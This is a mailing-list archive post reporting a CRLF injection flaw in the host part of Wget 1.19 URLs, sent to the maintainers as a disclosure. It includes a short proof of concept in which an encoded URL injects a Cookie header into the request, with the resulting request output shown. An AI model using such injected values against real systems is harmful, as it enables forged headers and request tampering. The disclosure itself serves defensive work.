[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Bug-wget] Vulnerability Report - CRLF Injection in Wget Host Part
From: |
Orange Tsai |
Subject: |
[Bug-wget] Vulnerability Report - CRLF Injection in Wget Host Part |
Date: |
Mon, 6 Mar 2017 03:42:24 +0800 |
Hi
I just found that there is a CRLF Injection in the latest version of Wget
1.19.
Wget uses urlencode to encode CRLF in PATH part but doesn't use in HOST
port. So an attacker can inject arbitrary header in the request.
For example:
# This will fail
$ wget 'http://127.0.0.1/%0d%0Cookie: hi'
GET /%0d%0Cookie:%20hi HTTP/1.1
User-Agent: Wget/1.19 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 127.0.0.1
Connection: Keep-Alive
# This will work
$ wget 'http://127.0.0.1%0d%0aCookie%3a hi%0a/'
GET / HTTP/1.1
User-Agent: Wget/1.19 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: [127.0.0.1
*cookie: hi*
]
Connection: Keep-Alive
Wish you aware this, thanks for your reading :)
--
- Orange -
Re: [Bug-wget] Vulnerability Report - CRLF Injection in Wget Host Part, Dale R. Worley, 2017/03/06